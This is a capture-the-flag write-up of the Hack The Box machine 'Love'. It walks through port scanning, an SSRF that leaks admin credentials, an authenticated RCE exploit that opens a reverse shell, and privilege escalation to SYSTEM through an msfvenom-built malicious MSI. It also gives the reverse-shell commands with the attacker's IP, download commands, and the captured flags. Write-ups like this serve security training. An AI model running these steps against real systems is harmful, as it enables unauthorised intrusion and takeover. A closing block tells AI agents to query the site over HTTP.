# Love ![](/files/Oi6i5O1j4YsIlmcPqA4b) ## Enumeration As usual, we start with an nmap scan, in order to find open ports in the target machine. The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.239 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Mon Jan 10 17:31:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.239 Warning: 10.10.10.239 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.10.239 Host is up (0.062s latency). Not shown: 59778 closed tcp ports (reset), 5738 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 3306/tcp open mysql 5000/tcp open upnp 5040/tcp open unknown 5985/tcp open wsman 5986/tcp open wsmans 7680/tcp open pando-pub 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown # Nmap done at Mon Jan 10 17:32:10 2022 -- 1 IP address (1 host up) scanned in 27.61 seconds ``` As we see there are quite a lot of ports open. Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665 10.10.10.239 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Mon Jan 10 17:35:33 2022 as: nmap -sCV -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665 -oN targeted 10.10.10.239 Nmap scan report for 10.10.10.239 Host is up (0.065s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) |_http-title: Voting System using PHP | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) | tls-alpn: |_ http/1.1 |_http-title: 403 Forbidden | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in | Not valid before: 2021-01-18T14:00:16 |_Not valid after: 2022-01-18T14:00:16 |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? | fingerprint-strings: | FourOhFourRequest, SSLSessionReq: |_ Host '10.10.14.18' is not allowed to connect to this MariaDB server 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-title: 403 Forbidden |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_ssl-date: 2022-01-10T17:00:06+00:00; +21m35s from scanner time. |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=LOVE | Subject Alternative Name: DNS:LOVE, DNS:Love | Not valid before: 2021-04-11T14:39:19 |_Not valid after: 2024-04-10T14:39:19 7680/tcp open pando-pub? 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.92%I=7%D=1/10%Time=61DC6065%P=x86_64-pc-linux-gnu%r(SS SF:LSessionReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.18'\x20is\x20not SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Fou SF:rOhFourRequest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.18'\x20is\x20 SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server"); Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h21m35s, deviation: 4h00m01s, median: 21m34s | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: Love | NetBIOS computer name: LOVE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-01-10T08:59:52-08:00 | smb2-time: | date: 2022-01-10T16:59:54 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jan 10 17:38:32 2022 -- 1 IP address (1 host up) scanned in 178.95 seconds ``` There is quite a lot of information. Let's start with the basics. In the first place, I see there is an HTTPS service running on port 443. Let's inspect the SSL certificate with the following command: > openssl s\_client -connect 10.10.10.239:443 * `s_client` implements a generic **SSL/TLS** client. * `-connect` tests **connectivity** to an HTTPS service.. At some point we should see this: ``` Certificate chain 0 s:C = in, ST = m, L = norway, O = ValentineCorp, OU = love.htb, CN = staging.love.htb, emailAddress = roy@love.htb i:C = in, ST = m, L = norway, O = ValentineCorp, OU = love.htb, CN = staging.love.htb, emailAddress = roy@love.htb ``` Now we know that the *common name (CN)* is `staging.love.htb` and the *Organization Unit (OU)* is `love.htb`. Let's add both to the `/etc/hosts` file and see if there is Virtual Hosting. ``` # Host addresses 127.0.0.1 localhost 127.0.1.1 alfa8sa ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes f02::2 ip6-allrouters 10.10.10.239 staging.love.htb love.htb ``` {% hint style="info" %} **Virtual hosting** is a method for hosting multiple domain names (with separate handling of each name) on a single server. {% endhint %} Let's see what appears with each domain name. If we open our browser, and search for `http://10.10.10.239`, we will see a login page that require an *ID* and a *password*. ![](/files/MIVpUjFczvQ2FCOxRyZk) If we search for `http://staging.love.htb`, we should see a *Free File Scanner* website. ![](/files/P5SEa0RDanVNJzvMswwG) ## Exploitation All the other domain names will show us a *403 Forbidden* message, so let's inspect this page a bit further. If we click on *Demo*, we should see something interesting. The webpage allow us to see the content of an especific URL. Let's try something, if you look carefully at the nmap scan, you could see there is another HTTP service running on port *5000*, but if try to see it's content on the browser we get the *403 Forbidden* message. ![](/files/MlhiqeqUWXmF8WYybHXJ) But maybe we could see it's content with the utility we found on the *Demo* page. All we have to do is specify the `http://localhost:5000` URL. ![](/files/P3DlN7T1kuz9STW123R0) And we got some credentials! This attack is called Server Side Request Forgery (SSRF). {% hint style="info" %} Server Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. {% endhint %} ![](/files/2uBZLxLJPhQKSN0hhbX9) So now we have credentials, but for what? On `http://10.10.10.239` there was a login page, but it was asking for an *ID* and a *password*, and we have a *user* and *password*. So that's not going to work. Let's try to list directories with gobuster. > gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 * `dir` enumerates **directories or files**. * `-u` the **target** URL. * `-w` path to the **wordlist**. * `-t` number of current **threads**, in this case 200 threads. ``` =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.239 [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/01/19 22:31:33 Starting gobuster in directory enumeration mode =============================================================== /Images (Status: 301) [Size: 338] [--> http://10.10.10.239/Images/] /images (Status: 301) [Size: 338] [--> http://10.10.10.239/images/] /admin (Status: 301) [Size: 337] [--> http://10.10.10.239/admin/] /plugins (Status: 301) [Size: 339] [--> http://10.10.10.239/plugins/] /includes (Status: 301) [Size: 340] [--> http://10.10.10.239/includes/] /dist (Status: 301) [Size: 336] [--> http://10.10.10.239/dist/] /licenses (Status: 403) [Size: 421] /examples (Status: 503) [Size: 402] /IMAGES (Status: 301) [Size: 338] [--> http://10.10.10.239/IMAGES/] /%20 (Status: 403) [Size: 302] /Admin (Status: 301) [Size: 337] [--> http://10.10.10.239/Admin/] /*checkout* (Status: 403) [Size: 302] /Plugins (Status: 301) [Size: 339] [--> http://10.10.10.239/Plugins/] /phpmyadmin (Status: 403) [Size: 302] /webalizer (Status: 403) [Size: 302] =============================================================== 2022/01/19 22:38:28 Finished =============================================================== ``` Gobuster found an `/Admin` directory, let's take a look at it. ![](/files/V0L1obbAABpCObmwoplh) This login page is a bit different, becouse it is asking for a *username* and a *password*. Let's try the credentials we found earlier. ![](/files/OIgLjrdFtl3l9fMecGvT) And we got in! At this point I tried to look for common exploits on exploit-db. {% hint style="info" %} Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers. {% endhint %} And I found a [Authenticated Remote Code Execution](https://www.exploit-db.com/exploits/49445) script coded in *python*. Before running it, we have to change the website address, the username, the password, out local IP address and a port i which we will be listening on. ``` # --- Edit your settings here ---- IP = "10.10.10.239" # Website's URL USERNAME = "admin" #Auth username PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password REV_IP = "10.10.14.12" # Reverse shell IP REV_PORT = "8888" # Reverse port # -------------------------------- ``` Let's set a netcat listener on port *8888*. > nc -lvnp 8888 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. And if we run the exploit, we should get a shell as the user *phoebe* and we could grab the user flag. > python3 exploit.py ``` listening on [any] 8888 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.10.239] 60626 b374k shell : connected Microsoft Windows [Version 10.0.19042.867] (c) 2020 Microsoft Corporation. All rights reserved. C:\xampp\htdocs\omrs\images>whoami whoami love\phoebe C:\xampp\htdocs\omrs\images>type c:\users\phoebe\desktop\user.txt type c:\users\phoebe\desktop\user.txt b195b1d1c75beff2ccb8c1b4d46bdb74 ``` ## Privilege Escalation Time to become the *NT AUTHORITY\SYSTEM* user. If you try to enumerate the system manually, you will not find much. Let's run WinPEAS and see what it tell us. {% hint style="info" %} WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. You can download it from the official Github page: {% endhint %} Let's set a SimpleHTTPServer with python on our current directory. > python -m SimpleHTTPServer Now on the victim machine let's run the following command in order to download the winPEAS binary from our machine. > powershell -c "wget -outfile winPEASx64.exe" If we run the binary a lot of text appear. But at some point we should see the following information: ``` อน Checking AlwaysInstallElevated https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated AlwaysInstallElevated set to 1 in HKLM! AlwaysInstallElevated set to 1 in HKCU! ``` It looks like *AlwaysInstallElevated* is set to 1 in both *HKLM* and *HKCU* registries. If you do your research on how to escalate privileges with the *AlwaysInstallElevated* set to 1 in both registries, you will notice that we can run *Microsoft Windows Installer Package (MSI)* with system privileges. The following link explains how to exploit this vulnerability: . As we can run *MSI* files with elevated privileges, the idea is to create a malicious MSI file that sends our machine a reverse shell as the *NT AUTHORITY\SYSTEM* user. Let's create this malicious file from our machine with *msfvenom*. > msfvenom -p windows/x64/shell\_reverse\_tcp lhost=10.10.14.12 lport=4444 -f msi -o reverse.msi * `-p` indicates the type of **payload**. * `lhost` local **host** IP. * `lport` local **port** of the listener. * `-f` output **format**. * `-o` save the output to a **file**. To transfer the malicious MSI file to the victim machine we do the same process as before. > python -m SimpleHTTPServer Now on the victim machine let's run the following command in order to download the MSI file from our machine. > powershell -c "wget -outfile reverse.msi Before running the MSI file, let's set another netcat listener on port 4444. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. To run the malicious MSI file we have to execute the following command: > msiexec /i reverse.msi And we get the shell as the *NT AUTHORITY\SYSTEM* user. Finally, all we have to do is reap the harvest and take the root flag. ``` listening on [any] 4444 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.10.239] 60637 Microsoft Windows [Version 10.0.19042.867] (c) 2020 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>type c:\users\administrator\desktop\root.txt type c:\users\administrator\desktop\root.txt b386de5a9e7f3c5aa500dff096f96ba8 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/windows-machines/love.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.